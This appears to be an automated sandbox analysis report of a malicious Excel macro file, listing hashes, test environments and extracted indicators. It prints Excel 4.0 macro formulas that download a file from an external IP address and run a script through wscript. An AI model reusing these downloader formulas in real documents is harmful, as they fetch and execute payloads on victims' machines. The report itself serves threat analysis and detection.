Static task
static1
Behavioral task
behavioral1
Sample
ad1cd20cdf48ccb42ddefd3c3a0033b9.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
ad1cd20cdf48ccb42ddefd3c3a0033b9.xlsm
Resource
win10v2004-20231215-en
General
-
Target
ad1cd20cdf48ccb42ddefd3c3a0033b9
-
Size
6KB
-
MD5
ad1cd20cdf48ccb42ddefd3c3a0033b9
-
SHA1
a5c11e16614a6d206d76fb3b068f2a5128b3fd9c
-
SHA256
497c758891df758b6b57ed619904acc433ec0a12353faf1162e1ba92cf46ed90
-
SHA512
84b090f0e571f3db92caa949854ba39b0ee0659cefa5682800bf006cb2f03c0328913f8beda936ef36f4fed14d794c2d29a675f496d7f56fc8d22a62103dde9b
-
SSDEEP
192:NDSMuSCbrA2OmmfR58UhHFBFYunb98yV8+N:NjuDM2w/1FY+b98yVP
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Signatures
Files
-
ad1cd20cdf48ccb42ddefd3c3a0033b9.xlsm office2007